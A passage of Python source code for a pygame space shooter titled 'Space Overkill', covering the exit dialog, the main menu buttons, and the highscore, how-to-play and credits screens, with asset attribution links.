pg.image.load(r'.\\resources\\images\\text-background\\home-background1920.png').convert_alpha()\r\n textBackgroundRect = home_txt_background.get_rect()\r\n textBackgroundRect.center = window.get_rect().center\r\n\r\n yes_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\yes72.png').convert_alpha()\r\n yes_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\yes88.png').convert_alpha()\r\n yes_btn_rect = yes_btn_inactive_img.get_rect()\r\n yes_btn_rect.center = ((window_width*3/8),(window_height/2)+60)\r\n\r\n yes_btn = OnlyImgButton(yes_btn_inactive_img, yes_btn_active_img,\r\n yes_btn_rect.x, yes_btn_rect.y)\r\n\r\n no_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\no72.png').convert_alpha()\r\n no_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\no88.png').convert_alpha()\r\n no_btn_rect = no_btn_inactive_img.get_rect()\r\n no_btn_rect.center = ((window_width*5/8),(window_height/2)+60)\r\n\r\n no_btn = OnlyImgButton(no_btn_inactive_img, no_btn_active_img,\r\n no_btn_rect.x, no_btn_rect.y)\r\n\r\n #window_background = pg.image.load(r\".\\resources\\images\\screenshots\\screenshot.png\") \r\n\r\n while wait_exit:\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n '''\r\n \r\n yes_btn_rect.center = ((window_width*3/8),(window_height/2)+60)\r\n no_btn_rect.center = ((window_width*5/8),(window_height/2)+60)\r\n yes_btn.update_param2(yes_btn_rect.x, yes_btn_rect.y)\r\n no_btn.update_param2(no_btn_rect.x, no_btn_rect.y)\r\n\r\n window.blit(pg.transform.scale(screenshot, (window_width, window_height)), (0,0))\r\n\r\n textBackgroundRect.center = window.get_rect().center\r\n textRect.center = ((window_width/2),(window_height/2)-60)\r\n window.blit(home_txt_background, textBackgroundRect)\r\n window.blit(textSurface, textRect)\r\n\r\n yes_btn.draw_button(yes_command, event_list)\r\n no_btn.draw_button(no_command, event_list)\r\n\r\n #play_btn.draw_button(play_command, event_list)\r\n\r\n #if mute:\r\n # unmute_btn.draw_button(unmute_command, event_list)\r\n #else:\r\n\r\n # mute_btn.draw_button(mute_command, event_list)\r\n\r\n pg.display.update()\r\n\r\ndef no_command():\r\n global wait_exit\r\n\r\n wait_exit = False\r\n\r\ndef yes_command():\r\n global wait_exit, intro, reset_game, score_value\r\n\r\n wait_exit = False\r\n intro = True\r\n reset()\r\n #reset_game = True\r\n\r\n #if score_value > 0:\r\n # update_highscore()\r\n #score_value = 0\r\n\r\n\r\n#Text Buttons with image properties and functions \r\nclass TxtButton(OnlyImgButton):\r\n\r\n def __init__(self, img_inactive, img_active, imgx, imgy, bg_inactive, bg_active, bgcx, bgcy, text):\r\n self.text = text\r\n self.bg_inactive = bg_inactive.convert_alpha()\r\n self.bg_active = bg_active.convert_alpha()\r\n self.bg_centerX = bgcx\r\n self.bg_centerY = bgcy\r\n self.bg_rect_inactive = None\r\n self.bg_rect_active = None\r\n self.textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 40)\r\n self.textSurface = None\r\n self.textRect = None\r\n self.mask_inactive = None\r\n self.mask_active = None\r\n super().__init__(img_inactive, img_active, imgx, imgy)\r\n\r\n def set_param(self):\r\n self.rect_inactive = self.img_inactive.get_rect(x=self.btn_inactiveX, y=self.btn_inactiveY)\r\n self.rect_active = self.img_active.get_rect()\r\n self.rect_active.center = self.rect_inactive.center\r\n self.rect_active.height = self.img_active.get_height()\r\n self.rect_active.width = self.img_active.get_width()\r\n self.btn_activeX = self.rect_active.x\r\n self.btn_activeY = self.rect_active.y\r\n self.bg_rect_inactive = self.bg_inactive.get_rect(center=(self.bg_centerX, self.bg_centerY))\r\n self.bg_rect_active = self.bg_active.get_rect(center=(self.bg_centerX, self.bg_centerY))\r\n self.rect_inactive.center = (self.bg_rect_inactive.center[0]-160, self.bg_rect_inactive.center[1])\r\n self.rect_active.center = (self.bg_rect_active.center[0]-160, self.bg_rect_active.center[1])\r\n self.textSurface_inactive = self.textFont.render(self.text, True, (0,0,0))\r\n self.textSurface_active = self.textFont.render(self.text, True, (255,255,255))\r\n self.textRect = self.textSurface_inactive.get_rect(center=(self.bg_rect_inactive.centerx, self.bg_rect_inactive.centery-4))\r\n self.mask_inactive = pg.mask.from_surface(self.bg_inactive, 0)\r\n self.mask_active = pg.mask.from_surface(self.bg_active)\r\n\r\n def update_param(self):\r\n self.bg_centerX = window_width/2 \r\n self.set_param()\r\n\r\n def draw_button(self, command=None, event_list=None):\r\n mouse_pos = pg.mouse.get_pos()\r\n #pg.event.clear()\r\n mouse_click = pg.mouse.get_pressed()\r\n\r\n if self.state == 'inactive':\r\n window.blit(self.bg_inactive, self.bg_rect_inactive)\r\n window.blit(self.img_inactive, self.rect_inactive)\r\n window.blit(self.textSurface_inactive, self.textRect)\r\n\r\n try:\r\n if self.mask_inactive.get_at((mouse_pos[0]-self.bg_rect_inactive.x,\r\n mouse_pos[1]-self.bg_rect_inactive.y)):\r\n self.state = 'active'\r\n except IndexError:\r\n pass\r\n\r\n elif self.state == 'active':\r\n window.blit(self.bg_active, self.bg_rect_active)\r\n window.blit(self.img_active, self.rect_active)\r\n window.blit(self.textSurface_active, self.textRect)\r\n \r\n try:\r\n if self.bg_rect_active.collidepoint(mouse_pos):\r\n if self.mask_active.get_at((mouse_pos[0]-self.bg_rect_active.x,\r\n mouse_pos[1]-self.bg_rect_active.y)):\r\n if event_list:\r\n for event in event_list:\r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n self.state = 'inactive'\r\n command()\r\n \r\n else:\r\n self.state = 'inactive'\r\n else:\r\n self.state = 'inactive'\r\n except IndexError:\r\n pass\r\n\r\n\r\nplay_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\play(b)72.png').convert_alpha()\r\nplay_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\play(w)72.png').convert_alpha()\r\nbackground_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background400,64.png').convert_alpha()\r\nbackground_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background-fill400,64.png').convert_alpha()\r\nbackground_text_btn_active_rect = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect.center = (window_width/2, window_height/2-15)\r\nplay_text_btn_inactive_rect = play_text_btn_inactive_img.get_rect()\r\nplay_text_btn_inactive_rect.center = (background_text_btn_active_rect.center[0]-160, background_text_btn_active_rect.center[1])\r\n\r\nplay_text_btn = TxtButton(play_text_btn_inactive_img, play_text_btn_active_img,\r\n play_text_btn_inactive_rect.x, play_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect.center[0], background_text_btn_active_rect.center[1],\r\n 'Play')\r\n\r\ndef play_text_command():\r\n global intro\r\n intro = False\r\n\r\nhow_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\how(b)64.png').convert_alpha()\r\nhow_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\how(w)64.png').convert_alpha()\r\nbackground_text_btn_active_rect5 = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect5.center = (window_width/2, window_height/2-15+80)\r\nhow_text_btn_inactive_rect = how_text_btn_inactive_img.get_rect()\r\nhow_text_btn_inactive_rect.center = (background_text_btn_active_rect5.center[0]-160, background_text_btn_active_rect5.center[1])\r\n\r\nhow_text_btn = TxtButton(how_text_btn_inactive_img, how_text_btn_active_img,\r\n how_text_btn_inactive_rect.x, how_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect5.center[0], background_text_btn_active_rect5.center[1],\r\n 'How to Play')\r\n\r\nhighscore_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\list(b)64.png').convert_alpha()\r\nhighscore_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\list(w)64.png').convert_alpha()\r\n#background_text_btn_inactive_img2 = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background400,72.png').convert_alpha()\r\n#background_text_btn_active_img2 = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background-fill400,72.png').convert_alpha()\r\nbackground_text_btn_active_rect2 = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect2.center = (window_width/2, window_height/2-15+80+80)\r\nhighscore_text_btn_inactive_rect = highscore_text_btn_inactive_img.get_rect()\r\nhighscore_text_btn_inactive_rect.center = (background_text_btn_active_rect2.center[0]-160, background_text_btn_active_rect2.center[1])\r\n\r\nhighscore_text_btn = TxtButton(highscore_text_btn_inactive_img, highscore_text_btn_active_img,\r\n highscore_text_btn_inactive_rect.x, highscore_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect2.center[0], background_text_btn_active_rect2.center[1],\r\n 'Highscores')\r\n\r\ncredit_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\credit(b)64.png').convert_alpha()\r\ncredit_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\credit(w)64.png').convert_alpha()\r\nbackground_text_btn_active_rect4 = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect4.center = (window_width/2, window_height/2-15+80+80+80)\r\ncredit_text_btn_inactive_rect = credit_text_btn_inactive_img.get_rect()\r\ncredit_text_btn_inactive_rect.center = (background_text_btn_active_rect4.center[0]-160, background_text_btn_active_rect4.center[1])\r\n\r\ncredit_text_btn = TxtButton(credit_text_btn_inactive_img, credit_text_btn_active_img,\r\n credit_text_btn_inactive_rect.x, credit_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect4.center[0], background_text_btn_active_rect4.center[1],\r\n 'Credits')\r\n\r\nquit_text_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\quit(b)64.png').convert_alpha()\r\nquit_text_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\main menu\\quit(w)64.png').convert_alpha()\r\n#background_text_btn_inactive_img3 = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background400,72.png')\r\n#background_text_btn_active_img3 = pg.image.load(r'.\\resources\\images\\buttons\\text-button-background\\text-button background-fill400,72.png')\r\nbackground_text_btn_active_rect3 = background_text_btn_active_img.get_rect()\r\nbackground_text_btn_active_rect3.center = (window_width/2, window_height/2-15+80+80+80+80)\r\nquit_text_btn_inactive_rect = quit_text_btn_inactive_img.get_rect()\r\nquit_text_btn_inactive_rect.center = (background_text_btn_active_rect3.center[0]-160, background_text_btn_active_rect3.center[1])\r\n\r\nquit_text_btn = TxtButton(quit_text_btn_inactive_img, quit_text_btn_active_img,\r\n quit_text_btn_inactive_rect.x, quit_text_btn_inactive_rect.y,\r\n background_text_btn_inactive_img, background_text_btn_active_img,\r\n background_text_btn_active_rect3.center[0], background_text_btn_active_rect3.center[1],\r\n 'Quit')\r\n\r\ndef quit_text_command():\r\n if score_value:\r\n update_highscore()\r\n pg.quit()\r\n sys.exit(0)\r\n\r\n\r\n#Main Menu\r\nintro = True\r\ndef game_intro():\r\n global intro, window_width, window_height, mute_btn, unmute_btn, mute\r\n global window_rect\r\n\r\n textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 100)\r\n textSurface1 = textFont.render('Space', True, (0,0,0))\r\n textSurface2 = textFont.render('Overkill', True, (0,0,0))\r\n textRect1 = textSurface1.get_rect()\r\n textRect2 = textSurface2.get_rect()\r\n textRect1.center = ((window_width/2), (window_height/8))#(window_height/12)\r\n textRect2.center = ((window_width/2), (window_height/8)+120)\r\n\r\n developerFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 25)\r\n developerSurface1 = developerFont.render('Developed by : ', True, (0,0,0))\r\n developerSurface2 = developerFont.render('Luv Gautam', True, (0,0,0))\r\n developerRect1 = developerSurface1.get_rect()\r\n developerRect2 = developerSurface2.get_rect()\r\n developerRect1.bottomright = (window_width-5, window_height-5-35)\r\n developerRect2.midbottom = (developerRect1.centerx, window_height-5)\r\n\r\n mute_btn.btn_inactiveX = window_width - mute_btn_inactive_img.get_width() - 15\r\n mute_btn.btn_inactiveY = 20\r\n mute_btn.update_param()\r\n unmute_btn.btn_inactiveX = window_width - unmute_btn_inactive_img.get_width() - 15\r\n unmute_btn.btn_inactiveY = 20\r\n unmute_btn.update_param()\r\n\r\n game_intro_img1 = pg.image.load(r'.\\resources\\images\\player\\battleship(90)192.png').convert_alpha()\r\n game_intro_img2 = pg.image.load(r'.\\resources\\images\\enemy\\enemy-medium(90)192.png').convert_alpha()\r\n game_intro_rect1 = game_intro_img1.get_rect(midleft=(window_width/8, textRect1.bottom))\r\n game_intro_rect2 = game_intro_img2.get_rect(midleft=(window_width*6/8, textRect1.bottom))\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n intro_clock = pg.time.Clock()\r\n \r\n while intro:\r\n dt = intro_clock.tick(60)\r\n dt = 30 if dt >= 30 else dt\r\n\r\n background.draw_background(dt)\r\n \r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n \r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n pause_btn.update_param()\r\n play_btn.update_param()\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n home_btn.update_param()\r\n '''\r\n \r\n textRect1.center = ((window_width/2), (window_height/8))#(window_height/12)\r\n textRect2.center = ((window_width/2), (window_height/8)+120)\r\n\r\n game_intro_rect1 = game_intro_img1.get_rect(midleft=(window_width/8, textRect1.bottom))\r\n game_intro_rect2 = game_intro_img2.get_rect(midleft=(window_width*6/8, textRect1.bottom))\r\n\r\n developerRect1.bottomright = (window_width-5, window_height-5-35)\r\n developerRect2.midbottom = (developerRect1.centerx, window_height-5)\r\n\r\n window.blit(textSurface1, textRect1)\r\n window.blit(textSurface2, textRect2)\r\n\r\n window.blit(developerSurface1, developerRect1)\r\n window.blit(developerSurface2, developerRect2)\r\n\r\n window.blit(game_intro_img1, game_intro_rect1)\r\n window.blit(game_intro_img2, game_intro_rect2)\r\n\r\n play_text_btn.draw_button(play_text_command, event_list)\r\n\r\n how_text_btn.draw_button(game_how_to, event_list)\r\n\r\n highscore_text_btn.draw_button(game_highscores, event_list)\r\n\r\n credit_text_btn.draw_button(game_credits, event_list)\r\n\r\n quit_text_btn.draw_button(quit_text_command, event_list)\r\n\r\n if mute:\r\n unmute_btn.draw_button(unmute_command, event_list)\r\n else:\r\n mute_btn.draw_button(mute_command, event_list)\r\n\r\n pg.display.update()\r\n\r\n textRect1.center = ((window_width/2), (window_height/8))#(window_height/12)\r\n textRect2.center = ((window_width/2), (window_height/8)+120)\r\n\r\n game_intro_rect1 = game_intro_img1.get_rect(midleft=(window_width/8, textRect1.bottom))\r\n game_intro_rect2 = game_intro_img2.get_rect(midleft=(window_width*6/8, textRect1.bottom))\r\n\r\n developerRect1.bottomright = (window_width-5, window_height-5-35)\r\n developerRect2.midbottom = (developerRect1.centerx, window_height-5)\r\n\r\ndef back_command():\r\n global highscore_menu, how_to_menu, credit_menu\r\n\r\n how_to_menu = False\r\n highscore_menu = False\r\n credit_menu = False\r\n\r\n #unmute_btn.update_param()\r\n #mute_btn.update_param()\r\n #play_text_btn.update_param()\r\n #highscore_text_btn.update_param()\r\n #quit_text_btn.update_param()\r\n\r\n\r\n#Static background for menu options\r\n#background_img = pg.image.load('.\\\\resources\\\\images\\\\background\\\\background.png').convert_alpha()\r\n\r\nhighscore_menu = False \r\ndef game_highscores():\r\n global score_value, hs_dict, background_img, background_over\r\n global window_width, window_height, highscore_menu\r\n\r\n #background_over = pg.image.load(r'.\\resources\\images\\text-background\\game-intro.png').convert_alpha()\r\n \r\n back_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\back40.png').convert_alpha()\r\n back_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\back56.png').convert_alpha()\r\n back_btn_inactive_x = 15\r\n back_btn_inactive_y = 20\r\n\r\n back_btn = OnlyImgButton(back_btn_inactive_img, back_btn_active_img,\r\n back_btn_inactive_x, back_btn_inactive_y)\r\n\r\n textFont_head = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 50)\r\n textSurface_head1 = textFont_head.render('Score', True, (0,0,0))\r\n textSurface_head2 = textFont_head.render('Date, Time', True, (0,0,0))\r\n textRect_head1 = textSurface_head1.get_rect()\r\n textRect_head2 = textSurface_head2.get_rect()\r\n\r\n textFont_val = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 40)\r\n\r\n highscore_menu = True\r\n while highscore_menu:\r\n\r\n window.blit(background_img, (0,0))\r\n window.blit(background_over, (0,0))\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n '''\r\n \r\n textRect_head1.center = ((window_width*1.5/6),(window_height/8)+20)\r\n textRect_head2.center = ((window_width*4/6),(window_height/8)+20)\r\n window.blit(textSurface_head1, textRect_head1)\r\n window.blit(textSurface_head2, textRect_head2)\r\n\r\n linespace = 70\r\n if hs_dict:\r\n for key, val in hs_dict.items():\r\n textSurface_val1 = textFont_val.render(str(val[0]), True, (0,0,0))\r\n textRect_val1 = textSurface_val1.get_rect()\r\n textRect_val1.center = ((window_width*1.5/6),(window_height/8)+30+linespace)\r\n window.blit(textSurface_val1, textRect_val1)\r\n\r\n textSurface_val2 = textFont_val.render(val[1], True, (0,0,0))\r\n textRect_val2 = textSurface_val2.get_rect()\r\n textRect_val2.center = ((window_width*4/6),(window_height/8)+30+linespace)\r\n window.blit(textSurface_val2, textRect_val2)\r\n\r\n linespace += 70\r\n\r\n back_btn.draw_button(back_command, event_list)\r\n\r\n pg.display.update()\r\n\r\nhow_to_menu = False \r\ndef game_how_to():\r\n global background_img, background_over\r\n global window_width, window_height, how_to_menu\r\n\r\n #background_over = pg.image.load(r'.\\resources\\images\\text-background\\game-intro.png').convert_alpha()\r\n \r\n back_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\back40.png').convert_alpha()\r\n back_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\back56.png').convert_alpha()\r\n back_btn_inactive_x = 15\r\n back_btn_inactive_y = 20\r\n\r\n back_btn = OnlyImgButton(back_btn_inactive_img, back_btn_active_img,\r\n back_btn_inactive_x, back_btn_inactive_y)\r\n\r\n linespace = 30\r\n paraspace = 40\r\n \r\n textFont_head = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 50)\r\n head_text = ['Player Movement', 'Player Weapons', 'Powerups']\r\n head_surface = []\r\n for txt in head_text:\r\n head_surface.append([textFont_head.render(txt, True, (0,0,0)),\r\n textFont_head.render(txt, True, (0,0,0)).get_rect()])\r\n head_surface[0][1].midtop = (window_width/2, 40)\r\n \r\n textFont_para = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 40)\r\n para_text = ['Use keyboard arrow keys ', ' to move player', 'spaceship.',\r\n 'Use keyboard key ', ' to shoot lasers at enemy.' ,\r\n 'Use keyboard key ', ' to shoot missile at enemy when fully', 'charged.',\r\n 'Collect Powerups for different effects.',\r\n ' - Gain 1 life.', ' - Freeze enemy for 3 seconds.', ' - Charge up the missile launcher.']\r\n para_surface = []\r\n for txt in para_text:\r\n para_surface.append([textFont_para.render(txt, True, (0,0,0)),\r\n textFont_para.render(txt, True, (0,0,0)).get_rect()])\r\n \r\n para_surface[0][1].topleft = (50, head_surface[0][1].bottom+linespace)\r\n\r\n images = [\r\n [pg.image.load(r'.\\resources\\images\\how-to\\left72.png'),\r\n pg.Rect(para_surface[0][1].right, para_surface[0][1].top, 72, 72)],\r\n [pg.image.load(r'.\\resources\\images\\how-to\\up72.png'),\r\n pg.Rect(para_surface[0][1].right+90, para_surface[0][1].top, 72, 72)],\r\n [pg.image.load(r'.\\resources\\images\\how-to\\down72.png'),\r\n pg.Rect(para_surface[0][1].right+90+90, para_surface[0][1].top, 72, 72)],\r\n [pg.image.load(r'.\\resources\\images\\how-to\\right72.png'),\r\n pg.Rect(para_surface[0][1].right+90+90+90, para_surface[0][1].top, 72, 72)]\r\n ]\r\n\r\n para_surface[1][1].topleft = (images[3][1].right, head_surface[0][1].bottom+linespace)\r\n para_surface[2][1].topleft = (50, para_surface[1][1].bottom+linespace)\r\n head_surface[1][1].midtop = (window_width/2, para_surface[2][1].bottom+paraspace)\r\n para_surface[3][1].topleft = (50, head_surface[1][1].bottom+linespace)\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\a72.png'),\r\n pg.Rect(para_surface[3][1].right, para_surface[3][1].top, 72, 72)])\r\n para_surface[4][1].topleft = (images[4][1].right, para_surface[3][1].top)\r\n para_surface[5][1].topleft = (50, para_surface[4][1].bottom+linespace)\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\s72.png'),\r\n pg.Rect(para_surface[5][1].right, para_surface[5][1].top, 72, 72)])\r\n para_surface[6][1].topleft = (images[5][1].right, para_surface[5][1].top)\r\n para_surface[7][1].topleft = (50, para_surface[6][1].bottom+linespace)\r\n head_surface[2][1].midtop = (window_width/2, para_surface[7][1].bottom+paraspace)\r\n para_surface[8][1].topleft = (50, head_surface[2][1].bottom+linespace)\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\life72.png'),\r\n pg.Rect(50, para_surface[8][1].bottom+linespace, 72, 72)])\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\freeze72.png'),\r\n pg.Rect(50, images[6][1].bottom+linespace, 72, 72)])\r\n images.append(\r\n [pg.image.load(r'.\\resources\\images\\how-to\\charge72.png'),\r\n pg.Rect(50, images[7][1].bottom+linespace, 72, 72)])\r\n para_surface[9][1].topleft = (images[6][1].right, images[6][1].top)\r\n para_surface[10][1].topleft = (images[7][1].right, images[7][1].top)\r\n para_surface[11][1].topleft = (images[8][1].right, images[8][1].top)\r\n\r\n endy = para_surface[-1][1].bottom\r\n window_scroll = 20\r\n scrollbar_height = window_height/(endy/window_height)\r\n scrollbar_rect = pg.Rect(window_width-30, 40, 20, scrollbar_height)\r\n scrollbar_scroll = (window_height-scrollbar_rect.bottom-20)*(window_scroll)/(endy+50-window_height)\r\n \r\n how_to_menu = True\r\n while how_to_menu:\r\n\r\n window.blit(background_img, (0,0))\r\n window.blit(background_over, (0,0))\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n \r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n '''\r\n \r\n if event.type == pg.MOUSEWHEEL:\r\n if event.y < 0:\r\n if para_surface[-1][1].bottom > window_height-50:\r\n for surface, rect in head_surface:\r\n rect.y += event.y*window_scroll\r\n for surface, rect in para_surface:\r\n rect.y += event.y*window_scroll\r\n for surface, rect in images:\r\n rect.y += event.y*window_scroll\r\n scrollbar_rect.y -= event.y*scrollbar_scroll\r\n if scrollbar_rect.bottom > window_height-20:\r\n scrollbar_rect.bottom = window_height-20\r\n elif event.y > 0:\r\n if head_surface[0][1].top < 40:\r\n for surface, rect in head_surface:\r\n rect.y += event.y*window_scroll\r\n for surface, rect in para_surface:\r\n rect.y += event.y*window_scroll\r\n for surface, rect in images:\r\n rect.y += event.y*window_scroll\r\n scrollbar_rect.y -= math.floor(event.y*scrollbar_scroll)\r\n if scrollbar_rect.bottom < scrollbar_height+40:\r\n scrollbar_rect.bottom = scrollbar_height+40\r\n\r\n for surface, rect in head_surface:\r\n rect.centerx = window_width/2\r\n window.blit(surface, rect)\r\n \r\n for surface, rect in para_surface: \r\n window.blit(surface, rect)\r\n\r\n for img, rect in images: \r\n window.blit(img, rect)\r\n\r\n back_btn.draw_button(back_command, event_list)\r\n\r\n scrollbar_rect.h = window_height/(endy/window_height)\r\n scrollbar_rect.left = window_width-30\r\n\r\n pg.draw.rect(window, (0,0,0), scrollbar_rect)\r\n \r\n pg.display.update()\r\n\r\ncredit_menu = False \r\ndef game_credits():\r\n global background_img, background_over\r\n global window_width, window_height, credit_menu\r\n\r\n #background_over = pg.image.load(r'.\\resources\\images\\text-background\\game-intro.png').convert_alpha()\r\n \r\n back_btn_inactive_img = pg.image.load(r'.\\resources\\images\\buttons\\back40.png').convert_alpha()\r\n back_btn_active_img = pg.image.load(r'.\\resources\\images\\buttons\\back56.png').convert_alpha()\r\n back_btn_inactive_x = 15\r\n back_btn_inactive_y = 20\r\n\r\n back_btn = OnlyImgButton(back_btn_inactive_img, back_btn_active_img,\r\n back_btn_inactive_x, back_btn_inactive_y)\r\n\r\n '''\r\n textFont_head = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 50)\r\n textSurface_head1 = textFont_head.render('Score', True, (0,0,0))\r\n textSurface_head2 = textFont_head.render('Date, Time', True, (0,0,0))\r\n textRect_head1 = textSurface_head1.get_rect()\r\n textRect_head2 = textSurface_head2.get_rect()\r\n '''\r\n \r\n textFont_entry = freetype.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 20)\r\n textFont_entry_underline = freetype.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 20)\r\n textFont_entry_underline.underline = True\r\n\r\n linespace = 12\r\n headspace = 20\r\n\r\n credit_img = [\r\n {'link' : \"https://www.flaticon.com/authors/icongeek26\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/freepik\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/bqlqn\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/darius-dan\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/fjstudio\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/smashicons\", 'rect' : None, 'underline' : False},\r\n {'link' : \"http://fontawesome.io/\", 'rect' : None, 'underline' : False},\r\n {'link' : \"http://www.creaticca.com/\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://creativemarket.com/eucalyp\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/kirill-kazachek\", 'rect' : None, 'underline' : False},\r\n {'link' : \"https://www.flaticon.com/authors/itim2101\", 'rect' : None, 'underline' : False}\r\n ]\r\n\r\n credit_sound = [\r\n {'link' : 'https://freesound.org/people/LittleRobotSoundFactory/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/BigKahuna360/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Jace/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/qubodup/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Bird_man/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/asdftekno/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/JustInvoke/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Mozfoo/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Robinhood76/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/alexmol/', 'rect' : None, 'underline' : False},\r\n {'link' : 'https://freesound.org/people/Capashen/', 'rect' : None, 'underline' : False}\r\n ]\r\n\r\n start_pos = [100, 0]\r\n\r\n window_scroll = 20\r\n \r\n credit_menu = True\r\n while credit_menu:\r\n\r\n window.blit(background_img, (0,0))\r\n window.blit(background_over, (0,0))\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n 